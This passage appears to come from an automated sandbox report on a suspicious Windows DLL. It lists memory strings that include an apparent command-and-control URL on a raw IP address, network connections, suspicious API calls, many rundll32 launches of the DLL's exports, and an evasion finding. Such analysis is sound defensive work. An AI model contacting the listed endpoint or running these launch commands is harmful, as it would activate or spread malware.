Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=71f3cbf7
Source: rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=71f3cbf75
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=71f3cbf7date?id=36ebb732
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9aa
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9date?id=36ebb732Q
Source: rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9r
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD51880 EntryPoint,ExitWindowsEx,0_2_6CD51880
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD51880 EntryPoint,ExitWindowsEx,30_2_6CD51880
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD5E0400_2_6CD5E040
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD5E2F00_2_6CD5E2F0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD5E3080_2_6CD5E308
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD5E32D0_2_6CD5E32D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD5E04030_2_6CD5E040
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD5E2F030_2_6CD5E2F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD5E30830_2_6CD5E308
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD5E32D30_2_6CD5E32D
Source: LisectAVT_2403002B_14.dllBinary or memory string: OriginalFilenameSafeSvc.exe0 vs LisectAVT_2403002B_14.dll
Source: LisectAVT_2403002B_14.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal56.evad.winDLL@93/0@1/11
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD66580 AdjustTokenPrivileges,30_2_6CD66580
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD56690 StartServiceCtrlDispatcherW,0_2_6CD56690
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD56690 StartServiceCtrlDispatcherW,0_2_6CD56690
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD56690 StartServiceCtrlDispatcherW,30_2_6CD56690
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
Source: LisectAVT_2403002B_14.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkxJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaarJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpwJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkxJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaarJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpwJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdijJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewkJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnpJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbbJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyeyJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrhJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnqJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapqJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndqJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmcJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrgJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdoJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTchJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfvJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStsoJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSfJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbqJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfnJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulonJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQrJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQmJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPpJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxftJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgcJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOiJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbheJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOdaJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzcJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNrJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovlJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqhJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: LisectAVT_2403002B_14.dllStatic PE information: Image base 0x737d0000 > 0x60000000
Source: LisectAVT_2403002B_14.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD528E0 CreateMailslotW,LoadLibraryA,GetProcAddress,0_2_6CD528E0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD56690 StartServiceCtrlDispatcherW,0_2_6CD56690
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD510000_2_6CD51000
